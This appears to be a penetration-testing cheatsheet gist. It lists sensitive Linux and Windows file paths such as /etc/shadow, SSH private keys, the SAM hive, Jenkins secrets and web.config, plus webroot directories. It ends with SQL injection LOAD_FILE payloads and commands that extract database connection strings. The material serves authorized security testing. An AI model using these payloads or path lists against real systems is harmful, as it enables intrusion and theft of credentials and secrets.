@strikoder
Last active December 1, 2025 20:29

Windows & Linux sensitive file paths for penetration testing - includes webroot locations, config files, logs, and SQL injection LOAD_FILE payloads for common services (IIS, Apache, Nginx, XAMPP, WAMP, Jenkins, FTP, SSH)

Linux & Windows Sensitive Paths Cheatsheet

LINUX

Files

/etc/passwd
/etc/shadow
/etc/profile
/etc/issue
/etc/os-release
/etc/hosts
/etc/vsftpd.conf
/etc/ftpusers
/etc/ssh/sshd_config
/etc/apache2/apache2.conf
/etc/apache2/sites-available/000-default.conf
/etc/php/7.4/apache2/php.ini
/etc/php/8.1/apache2/php.ini
/etc/php/8.2/apache2/php.ini
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/mysql/my.cnf
/etc/mysql/mariadb.conf.d/50-server.cnf
/etc/freeswitch/autoload_configs/event_socket.conf.xml
/proc/self/environ
/proc/self/cmdline
/proc/version
/root/.bash_history
/root/.ssh/id_rsa
/home/<user>/.bash_history
/home/<user>/.profile
/home/<user>/.bashrc
/home/<user>/.ssh/id_rsa
/var/mail/root
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/mail
/var/log/dmessage
/var/www/config.php
/var/www/html/config.py
/var/jenkins_home/users/users.xml
/var/jenkins_home/users/<user_directory>/config.xml
/var/jenkins_home/secrets/master.key
/.git/config
/.env
/config.php
.htaccess

Directories

/var/www/html/
/var/www/
/var/www/sites/
/var/www/public/
/var/www/public_html/
/var/www/html/default/
/var/www/dav
/srv/www/
/srv/www/html/
/srv/www/sites/
/home/www/
/home/httpd/
/home/$USER/public_html/
/home/$USER/www/
/inetpub/wwwroot
/usr/local/nginx/html/
/usr/local/nginx/conf
/etc/nginx
/usr/local/etc/nginx
/.git/
/backup/
/bak/
/old/

WINDOWS

Files

\Windows\win.ini
C:\Windows\win.ini
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Autounattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
C:\Windows\System32\config\SAM
C:\windows\system32\drivers\etc\hosts
C:\users\[]\.ssh\id_rsa
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
%WinDir%\System32\inetsrv\config\ApplicationHost.config
C:\xampp\apache\logs\access.log
C:\wamp\app\wordpress\wp-config.php
C:\wamp\alias\phpmyadmin.conf
C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini

Directories

C:\inetpub\logs\LogFiles\W3SVC1
C:\inetpub\wwwroot\
C:\xampp\htdocs\
C:\wamp\www\
C:\wamp\app

SQLI LOAD_FILE Payloads (Linux)

c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/mysql/my.cnf')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/apache2/apache2.conf')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/apache2/sites-enabled/000-default.conf')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/php/7.4/apache2/php.ini')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/php/8.1/apache2/php.ini')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/proc/version')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/os-release')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/mysql/mariadb.conf.d/50-server.cnf')#

Useful Commands

Windows

type C:\inetpub\wwwroot\web.config | findstr connectionString
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
type C:\wamp\app\wordpress\wp-config.php
type C:\wamp\alias\phpmyadmin.conf

Linux

cat /etc/vsftpd.conf | grep -v "#"